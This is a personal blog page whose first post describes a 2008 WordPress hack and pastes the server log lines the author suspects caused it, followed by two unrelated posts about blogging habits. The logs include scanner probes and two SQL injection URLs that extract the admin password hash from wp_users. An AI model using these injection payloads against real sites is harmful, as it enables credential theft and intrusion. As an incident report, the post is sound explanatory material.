Hacked!

Last week, this blog was hacked. As far as hacks go, it was pretty minor: traffic coming from search engines was redirected to a spammy search engine (your-needs.info) with the query from the Referer header being passed along. Traffic from other links apparently didn’t get redirected.

The hack is described at the wordpress forums and appears to be spreading.

I’ve been running an ancient version of WordPress and had meant to upgrade, but it never seemed urgent; hopefully, I’ve learned that lesson. While upgrading, I decided to upgrade from the default WordPress 1.X theme I was using to this very nice Classy theme by Benedikt Rieke-Benninghaus, though I’ve already started tweaking it.

Thanks to Mike Hochster for telling me that my blog was broken and Brian White for pointing me at easy instructions for keeping WordPress up to date.

For the curious, I suspect the attack corresponded to one of the following log entries:

84.244.147.70 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-admin/ HTTP/1.1" 302 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 391 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "GET /xmlrpc.php HTTP/1.1" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=6 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=7 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:40 -0400] "GET /wp-trackback.php?p=8 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=9 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=10 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=11 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=12 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=13 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=14 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=15 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=16 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=17 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=18 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=19 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=20 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=21 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=22 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=23 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=24 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=25 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:47 -0400] "POST /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"

Why I don’t blog more

In theory, at least, I like to blog. I’ve tried to do it for at least five years. And I’ve never averaged more than one post per month.

I’ve come to realize that there are two things which I consider important in my life: my family and my job. (This should be an obvious fact about a married professional with two children, but I’ve rarely stated it that way for myself.) Most of my time is spent on one or the other. Add in the things I can’t seem to avoid, such as commuting or home renovations, and I’m left with almost nothing. I’ve lost touch with lots of friends. I rarely end up replying to personal email. My job is my only hobby. I do the other things I want to do — work out, cook, read books, see friends — much less than I’d like to.

This applies in the internet space, too. I don’t blog often. I haven’t written any open source code in years. I use Wikipedia but I don’t contribute back very often. I don’t post photos publicly.

It’s also why I haven’t tried out social networks. It seems that I have a hard enough time keeping up with my existing friends using traditional means that adding new techniques wouldn’t help — it would just create more obligations for me — though I’m beginning to rethink that.

So, maybe, when I ask myself why I’m not blogging, I need to remind myself that, in fact, I’ve made it less important than the few things I do actually find important. And I admire the people who blog well quite a lot, especially if it’s not their full-time career.

I think I like WordPress

So, I used to write a blog by hand in HTML. Then I wrote some tools to generate it from XML. Then I went back to hand-written HTML. And that explains why I average about six posts a year.

Perhaps blogging software isn’t a bad idea at all…

My next task is to pull the old, handwritten posts into WordPress. Then maybe I’ll play with themes.